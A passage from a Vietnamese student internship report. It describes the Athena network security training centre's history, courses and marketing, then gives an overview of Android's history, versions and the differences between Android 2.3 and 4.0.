  • 11. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 11 PHẦN 1: GIỚI THIỆU VỀ NƠI THỰC TẬP 1. Giới thiệu về Trung tâm Athena Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008. Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần vào công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau: - Công tác huấn luyện, quảng bá kiến thức tin học, đặc biệt trong lĩnh vực mạng máy tính, internet, bảo mật và thương mại điện tử…. - Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất kinh doanh. - Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu. - Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ liệu thông tin về các ứng dụng và sự cố mạng. - Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự cố máy tính. 2. Trụ sở và các chi nhánh - Trụ sở chính: Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA. 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam. Website: www.athena.com.vn
  • 12. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 12 Điện thoại: ( 84-8 ) 3824 4041 Hotline: 0943 23 00 99 - Cơ sở 2_Tại TP Hồ Chí Minh: Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam. Website: www.Athena.Edu.Vn Điện thoại: ( 84-8 ) 2210 3801 Hotline: 0943 20 00 88 - Chi nhánh Nha Trang + Điện thoại : 08. 3824 4041 - Fax: 08. 39 111 692 + Website: www.athena.edu.vn + Email : training@athenavn.com 3. Quá trình hình thành và phát triển 3.1.Quá trình hình thành Năm 2000, một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ thông tin trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho đất nước và xã hội. Các thành viên sáng lập trung tâm gồm: Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại là giám đốc dự án của công ty Siemen Telecom.
  • 13. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 13 Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó Tổng công ty FPT. Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm công nghệ thông tin của Ngân hàng. Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena. Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam. 3.2.Quá trình phát triển Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh nghiệp về các chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng kí học. Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của đất nước nói chung, các doanh nghiệp, cá nhân nói riêng. Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và học viện công nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên của trung tâm. Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám
  • 14. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 14 đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng. Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà. 3.3.Cơ cấu tổ chức Sơ đồ tổ chức công ty
  • 15. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 15 4. Tình hình hoạt động trong năm 2011 4.1.Cơ cấu sản phẩm 4.1.1. Các khóa học dài hạn - Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security specialist. - Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security Technician. - Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager Administrator. 4.1.2. Các khóa học ngắn hạn 4.1.2.1.Khóa Quản trị mạng - Quản trị mạng Microsoft căn bản ACBN - Phần cứng máy tính, laptop, server - Quản trị hệ thống mạng Microsoft MCSA Security. - Quản trị mạng Microsoft nâng cao MCSE - Quản trị window Vista - Quản trị hệ thống Window Server 2003:2008 - Lớp Master Exchange Mail Server - Quản trị mạng quốc tế Cissco CCNA - Quản trị hệ thống mạng Linux 1 và Linux 2. 4.1.2.2.Khóa thiết kế web và bảo mật mạng - Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart - Lập trình web với Php và MySQL - Bảo mật mạng quốc tế ACNS - Hacker mũ trắng - Athena Mastering Firewall Security - Bảo mật website. 4.1.2.3. Các sản phẩm khác. - Chuyên đề thực hành sao lưu và phục hồi dữ liệu
  • 16. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 16 - Chuyên đề thực hành bảo mật mạng Wi_Fi - Chuyên đề Ghost qua mạng - Chuyên đề xây dựng và quản trị diễn đàn - Chuyên đề bảo mật dữ liệu phòng chống nội gián - Chuyên đề quản lý tài sản công nghệ thông tin - Chuyên đề kỹ năng thương mại điện tử. 5. Chiến lược Marketing của Trung tâm Athena 5.1. Chiến lược sản phẩm Chiến lược sản phẩm là sự cố kết gắn bó của sự lựa chọn và của những biện pháp phải sử dụng để xác định một tập hợp sản phẩm bao gồm các dòng sản phẩm và các món hàng sao cho phù hợp nhất với thị trường mục tiêu và từng giai đoạn khác nhau trong chu kì sản phẩm. Chiến lược sản phẩm đóng vai trò cực kì quan trọng trong hoạt động Marketing, nó là công cụ cạnh tranh bền vững của doanh nghiệp. Thực hiện tốt chiến lược về sản phẩm thì các chiến lược giá, phân phối, xúc tiến mới được triển khai và phối hợp một cách hiệu quả nhất. Không chỉ thế, chiến lược sản phẩm còn là một trong những yếu tố giúp doanh nghiệp thực hiện tốt mục tiêu marketing trong từng thời kì. Với phương châm “ Uy tín, chất lượng đào tạo và sự hài lòng của khách hàng” lên hàng đầu. Trung tâm Đào tạo Quản trị và An ninh mạng Athena luôn nổ lực tập trung vào nâng cao chất lượng giáo dục, tuyển dụng đội ngũ giảng viên có trình độ chuyên môn và kinh nghiệm cao, đội ngũ tư vấn viên giúp học viên có thể lựa chọn những chương trình phù hợp và Bộ phận chuyên trách về cập nhật thông tin cũng như làm mới giáo án nhằm đảm bảo chất lượng đào tạo tốt nhất cho từng học viên khi đến với trung tâm. Chính vì xác định được tầm quan trọng của chiến lược sản phẩm, Trung tâm Đào tạo Quản trị và An ninh mạng Athena đã đưa ra các chiến lược sản phẩm như sau: 5.2. Chiến lược tập hợp sản phẩm: Athena tập trung vào chiến lược mở rộng tập hợp sản phẩm. Có nghĩa là Athena tăng thêm các dòng sản phẩm mới thích hợp với từng thời kì cụ thể theo yêu cầu của khách hàng, cụ thể theo từng
  • 17. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 17 giai đoạn phát triển của doanh nghiệp cũng như yêu cầu của xã hội về lĩnh vực công nghệ thông tin. Vào những ngày đầu thành lập với tư cách là một nhóm nhỏ bao gồm các thành viên yêu thích lĩnh vực công nghệ thông tin và hổ trợ các doanh nghiệp với chương trình “ ứng cứu máy tinh”. Athena tập trung vào lĩnh vực đào tạo chuyên gia an ninh mạng AN2S và chương trình cảnh sát máy tính nhằm giúp các doanh nghiệp xử lý các vấn đề về máy tính và mạng máy tính. Đào tạo và cung cấp cho xã hội lực lượng nguồn lao động trong lĩnh vực bảo vệ máy tính và mạng máy tính. Trong quá trình phát triển, internet trở thành một công cụ hữu hiệu và là phương tiện kinh doanh của hầu hết các tổ chức, doanh nghiệp, cá nhân. Để đáp ứng được nhu cầu ngày càng tăng cao về nguồn nhân lực trong lĩnh vực mạng internet, Athena tăng thêm các khóa học về mạng máy tính, chuyên gia online marketing hay các khóa học về E_marketing. Ngày nay, với sự phát triển mạnh mẽ của ngành công nghệ thông tin, ngày càng nhiều doanh nghiệp đòi hỏi các chứng chỉ quốc tế trong lĩnh vực này. Nắm bắt được xu thế mới của thời đại, Trung tâm Đào tạo Quản trị và An ninh mạng Athena đã mở rộng chương trình đào tạo, tổ chức thêm các khóa học đạt chứng chỉ quốc tế như MCSA, Quản trị mạng Cissco…. 5.3. Chiến lược dòng sản phẩm: Để có thể phân bổ rủi ro cũng như nâng cao được mức lợi nhuận cho doanh nghiệp. Trung tâm Đào tạo Quản trị và An ninh mạng Athena tập trung vào chiến lược phát triển dòng sản phẩm bằng cách tập trung đầu tư vào những dòng sản phẩm chủ lực của doanh nghiệp để tối đa hóa lợi nhuận, đồng thời phát triển thêm các dòng sản phẩm mới như các khóa chuyên đề nhằm hổ trợ tạo sự đa dạng của các dòng sản phẩm, đáp ứng được nhu cầu của xã hội, cố gắng dẫn đầu thị trường và lắp kín các lỗ hổng để ngăn ngừa đối thủ cạnh tranh. Trong đó khóa học chủ lực của doanh nghiệp là các khóa học lấy các chứng chỉ quốc tế như: MCSE, Quản trị mạng Cissco, Bảo mật web Security+…
  • 18. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 18 PHẦN 2: BÁO CÁO ĐỀ TÀI 1. Giới thiệu về Android 1.1.Android là gì? Android là một hệ điều hành dựa trên nền tảng Linux được thiết kế dành cho các thiết bị di động có màn hình cảm ứng như điện thoại thông minh và máy tính bảng. Android ra mắt vào năm 2007 cùng với tuyên bố thành lập Liên minh thiết bị cầm tay mở: một hiệp hội gồm các công ty phần cứng, phần mềm, và viễn thông với mục tiêu đẩy mạnh các tiêu chuẩn mở cho các thiết bị di động. Chiếc điện thoại đầu tiên chạy Android được bán vào tháng 10 năm 2008. Android có mã nguồn mở và Google phát hành mã nguồn theo Giấy phép Apache. Chính mã nguồn mở cùng với một giấy phép không có nhiều ràng buộc đã cho phép các nhà phát triển thiết bị, mạng di động và các lập trình viên nhiệt huyết được điều chỉnh và phân phối Android một cách tự do. Ngoài ra, Android còn có một cộng đồng lập trình viên đông đảo chuyên viết các ứng dụng để mở rộng chức năng của thiết bị, bằng một loại ngôn ngữ lập trình Java có sửa đổi. Vào tháng 10 năm 2012, có khoảng 700.000 ứng dụng trên Android, và số lượt tải ứng dụng từ Google Play, cửa hàng ứng dụng chính của Android, ước tính khoảng 25 tỷ lượt. Những yếu tố này đã giúp Android trở thành nền tảng điện thoại thông minh phổ biến nhất thế giới, vượt qua Symbian vào quý 4 năm 2010, và được các công ty công nghệ lựa chọn khi họ cần một hệ điều hành không nặng nề, có khả năng tinh chỉnh, và giá rẻ chạy trên các thiết bị công nghệ cao thay vì tạo dựng từ đầu. Kết quả là mặc dù được thiết kế để chạy trên điện thoại và máy tính bảng, Android đã xuất hiện trên TV, máy chơi game và các thiết bị điện tử khác. Bản chất mở của Android cũng khích lệ một đội ngũ đông đảo lập trình viên và những người đam mê sử dụng mã nguồn mở để tạo ra những dự án do cộng đồng quản lý. Những dự án này bổ sung các tính năng cao cấp cho những người dùng thích tìm tòi hoặc đưa Android vào các thiết bị ban đầu chạy hệ điều hành khác. Android chiếm 75% thị phần điện thoại thông minh trên toàn thế giới vào thời điểm quý 3 năm 2012, với tổng cộng 500 triệu thiết bị đã được kích hoạt và 1,3 triệu lượt kích hoạt mỗi ngày. Sự thành công của hệ điều hành cũng khiến nó trở thành mục tiêu trong các vụ kiện liên quan đến bằng phát minh, góp mặt trong cái gọi là "cuộc chiến điện thoại thông minh" giữa các công ty công nghệ. 1.2.Lịch sử phát triển Anroid Tháng 7 năm 2005, Google mua lại Android, Inc., một công ty nhỏ mới thành lập có trụ sở ở Palo Alto, California, Mỹ. Những nhà đồng sáng lập của Android chuyển sang làm việc tại Google gồm có Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập công ty Wildfire Communications), Nick Sears (từng là phó chủ tịch của T-Mobile), và Chris White (trưởng nhóm thiết kế và phát triển giao diện tại WebTV). Khi đó, có rất ít thông tin về các công việc của Android, ngoại trừ việc họ đang phát triển phần mềm cho điện thoại di động. Điều này tạo những tin đồn về việc Google có ý định bước vào thị trường điện thoại di động. Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động dựa trên hạt nhân Linux, được họ tiếp thị đến các nhà sản xuất thiết bị cầm tay và các nhà mạng trên những tiền đề về việc cung cấp một hệ thống mềm dẻo, có khả năng nâng cấp mở rộng cao.[cần dẫn nguồn] Một số nguồn tin cho biết trước đó Google đã lên danh sách các thành phần phần cứng và các đối tác
  • 19. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 19 phần mềm, đồng thời ra hiệu với các nhà mạng rằng họ sẵn sàng hợp tác ở nhiều cấp độ khác nhau. Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương tiện truyền thông in và online cũng sớm có bài viết về những tin đồn cho rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu Google. Và lại càng có nhiều suy đoán sau bài viết về việc Google đang định nghĩa các đặc tả công nghệ và trình diễn các mẫu thử với các nhà sản xuất điện thoại di động và nhà mạng. 1.3.Đặt điểm của Android 1.3.1. Tính mở Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có. Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho phép người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người dùng. Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu hóa bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp tục phát triển bởi cộng đồng phát triển để tạo ra các ứng dụng di động hoàn hảo. 1.3.2. Tính ngang bằng của các ứng dụng. Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện thoại. Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ các nhu cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình thích. 1.3.3. Phá vỡ rào cản phát triển ứng dụng. Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có thể kết hợp thông tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên bản đồ – để cung cấp chính xác hơn cho người khác. Với Android, người phát triển có thể xây dựng một ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo khi họ đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ định vị toàn cầu GPS. 1.3.4. Xây dựng ứng dụng dễ dàng và nhanh chóng Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết được vị trí của thiết bị và cho phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng.
  • 20. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 20 1.4.Các phiên bản của android Lịch sử phiên bản của hệ điều hành di động Android bắt đầu với bản Android beta vào tháng 11 năm 2007. Phiên bản thương mại đầu tiên, Android 1.0, được phát hành vào tháng 9 năm 2008. Android đang được phát triển bởi Google và Open Handset Alliance (OHA), và đã có một số bản cập nhật cho hệ điều hành này kể từ khi ra mắt. Từ tháng 4 2009, phiên bản Android được phát triển dưới tên mã là chủ đề bánh kẹo và phát hành theo thứ tự bảng chữ cái: Cupcake (1.5), Donut (1.6), Eclair (2.0–2.1), Froyo (2.2–2.2.3), Gingerbread (2.3–2.3.7), Honeycomb (3.0–3.2.6), Ice Cream Sandwich (4.0–4.0.4), Jelly Bean (4.1–4.3), và KitKat (4.4). Vào 3 tháng 9 năm 2013, Google công bố rằng 1 tỉ thiết bị đã được kích hoạt hiện sử dụng Android OS trên toàn cầu. Bản cập nhật Android gần đây nhất là KitKat 4.4, nó được phát hành bản thương mại trên thiết bị 22 tháng 11 2013, thông qua cập nhật OTA. Phiên bản API Tên Ngày phát hành 1.0 Cấp 1 23/9/ 2008 1.1 Cấp 2 9/2/2009 1.5 Cấp 3 Cupcake 30/4/2009 1.6 Cấp 4 Donut 15/9/2009 2.0 Cấp 5 Eclair 26/10/2009 2.0.1 Cấp 6 3/12/2009 2.1 Cấp 7 12/1/2010 2.2 Cấp 8 Froyo 20/5/2010 2.2.1 18/1/2011 2.2.2 22/1/2011 2.2.3 21/11/2011 2.3 Cấp 9 Gingerbread 6/12/2010 2.3.1 12/2010 2.3.2 1/2011 2.3.3 Cấp 10 Gingerbread 9/2/2011 2.3.4 28/4/2011 2.3.5 25/7/2011 2.3.6 2/9/2011 2.3.7 21/9/2011
  • 21. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 21 3.0 Cấp 11 Honeycomb 22/2/2011 3.1 Cấp 12 10/5/2011 3.2 Cấp 13 15/7/2011 3.2.1 20/9/2011 3.2.2 30/8/2011 3.2.3 3.2.4 12/2011 3.2.5 1/2012 3.2.6 2/1012 4.0 Cấp 14 Ice Cream Sandwich 19/10/2011 4.0.1 21/10/2011 4.0.2 28/11/2011 4.0.3 Cấp 15 16/12/2011 4.0.4 29/3/2012 4.1 Cấp 16 Jelly Bean 9/7/2012 4.1.1 23/7/2012 4.1.2 9/10/2012 4.2 Cấp 17 13/11/2012 4.2.1 27/11/2012 4.2.2 11/2/2013 4.3 Cấp 18 24/7/1013 4.3.1 3/10/2013 4.4 Cấp 19 KitKat 31/10/2013 4.4.1 5/12/2013 4.4.2 9/12/2013 4.4.3 2/6/2014 4.4.4 19/6/2014
  • 22. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 22 1.5.Tỷ lệ sử dụng các phiên bản android Phần lớn các thiết bị Android cho tới nay vẫn chạy hệ điều hành phiên bản 4.1.x Jelly Bean được phát hành ngày 9 tháng 7 năm 2012 nhờ tính ổn định và hỗ trợ tốt các máy có cấu hình thấp cùng với các phiên bản 4.x khác. Bên cạnh đó các thiết bị Android vẫn còn sử dụng các phiên bản cũ hơn là 2.3 Gingerbread phát hành ngày 6 tháng 12 năm 2010. Tỷ lệ sử dụng các phiên bản khác nhau tính đến ngày 20 tháng 7 năm 2014 1.6.So sánh android 2.3 (Gingerbread) và android 4.x (4.0 – Ice Cream Sandwich): Android 2.3, tên mã là Gingerbread được phát hành vào ngày 6 tháng 12 năm 2010 và là một bản nâng cấp của Android v2.2 Froyo. Các phiên bản 2.3 được thiết kế đặc biệt cho điện thoại thông minh, nó được coi là một trong những phiên bản phổ biến nhất của Android cho điện thoại thông minh. Ngoài bố trí đã có sẵn trên Froyo, công ty cung cấp các thay đổi như giao diện người dùng được cập nhật, tăng tốc độ và sự đơn giản, hỗ trợ cho màn hình lớn hơn và độ phân giải cao, hỗ trợ cho hệ thống điện thoại SIP VOIP, bàn phím ảo nhanh hơn và trực quan hơn, chức năng sao chép dán nâng cao, hỗ trợ NFC, hiệu ứng âm thanh mới, quản lý download mới, hỗ trợ nhiều camera, hỗ trợ xem video WebM/VP8 và AAC mã hóa âm thanh, cải thiện quản lý điện năng, chuyển từ YAFFS đến ext4 trên các thiết bị mới hơn, âm thanh, đồ họa và cải tiến đầu vào cho các nhà phát triển trò chơi, đồng thời thu gom rác thải và hỗ trợ cho các cảm biến nhiều hơn. Công ty cũng vận chuyển một cập nhật nhỏ cho Gingerbread theo phiên bản 2.3.3-2.3.7. Những bản cập nhật được cung cấp tính năng mới như: hỗ trợ cho giọng nói hoặc video chat, mở cửa phụ kiện hỗ trợ thư viện, cải tiến để ứng dụng gmail, hình ảnh động bóng cho danh sách cuộn, cải tiến phần mềm máy ảnh và cải thiện hiệu quả pin. Android 4.0 Ice Cream Sandwich đã được công khai phát hành vào ngày 19 Tháng 10 năm 2011. Các Android 4.0 thật sự là một sự là một bản nâng cấp của 2.3 Gingerbread và được cung cấp một loạt các
  • 23. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 23 tính năng mới. Android cũng đã có phiên bản 3.0, chỉ dành cho máy tính bảng. Phiên bản này về cơ bản là một sự kết hợp của Android 2.3.x và Android 3.x. Công ty cung cấp các tính năng cập nhật như: nút mềm, widgets, dễ dàng để tạo thư mục mới, cải thiện thư thoại trực quan, chức năng pinch-to-zoom, chụp ảnh màn hình, bàn phím được cải thiện, khả năng truy cập các ứng dụng từ lockscreen, tính năng mở khóa bằng nhận diện khuôn mặt, trình duyệt web theo thẻ, tự động đồng bộ hóa trình duyệt chrome đánh dấu, kiểu chữ mới cho giao diện người dùng, cải thiện ứng dụng máy ảnh, được xây dựng trong biên tập ảnh, bố trí bộ sưu tập mới, ứng dụng tích hợp với mạng xã hội, cập nhật trạng thái và hình ảnh hi-res, khả năng tương thích NFC, tăng tốc phần cứng, quản lý wifi và quay video 1080p 1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt Android 2.3 Android 4.0 Cần ít nhất 128 MB bộ nhớ có sẵn cho Kernel và cho không gian người sử dụng Cần ít nhất 340 MB bộ nhớ có sẵn cho kernel và cho không gian người sử dụng Dung lượng Ram tối thiểu cần thiết là 150MB Dung lượng Ram tối thiểu cần thiết là 350 MB Màn hình: - Màn hình phải có kích cỡ ít nhất 2,5 inch - Mật độ phải được ít nhất 100 dpi - Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779 (16:9) - Công nghệ màn hình được sử dụng là công nghệ “ Square pixels” Màn hình: - Màn hình phải có kích cỡ ít nhất 426x320 - Mật độ phải được ít nhất 100 dpi - Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85 (16:9) Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý Các API Android bao gồm trình quản lý download các ứng dụng có thể sử dụng để tải dữ liệu.Trình quản lí download phải có khả năng tải tập tin có dung lượng ít nhất 55 MB Các API Android bao gồm trình quản lý download các ứng dụng có thể sử dụng để tải dữ liệu.Trình quản lí download phải có khả năng tải tập tin có dung lượng ít nhất 100 MB 1.6.2. Sự khác nhau về giao diện Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảm ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu lại để xử lý các đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn ra gần như ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng rung của thiết bị để tạo phản hồi rung cho người dùng. Những thiết bị phần cứng bên trong như gia tốc kế, con quay hồi chuyển và cảm biến khoảng cách được một số ứng dụng sử dụng để phản hồi một số hành động khác của người
  • 24. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 24 dùng, ví dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo vị trí của thiết bị, hoặc cho phép người dùng lái xe đua bằng xoay thiết bị, giống như đang điều khiển vô-lăng. Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu với các thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn làm việc) trên máy tính để bàn. Màn hính chính Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng ứng dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động, cập nhật tự động như dự báo thời tiết, hộp thư của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình chính. Màn hình chính có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao diện màn hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên Google Play và các kho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình chính, thậm chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng hạn. Phần lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi của các thiết bị Android của họ để phân biệt với các hãng cạnh tranh. Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan trọng hoặc cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm gián đoạn hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời đầu, người dùng có thể nhấn vào thông báo để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật được bổ sung theo tính năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải mở ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc hoặc xóa nó đi. Android 2.3 Android 4.0 Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt hơn Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Menu Không có widget menu Có Widget menu giúp tìm nhanh thông tin mà không cần mở ứng dụng
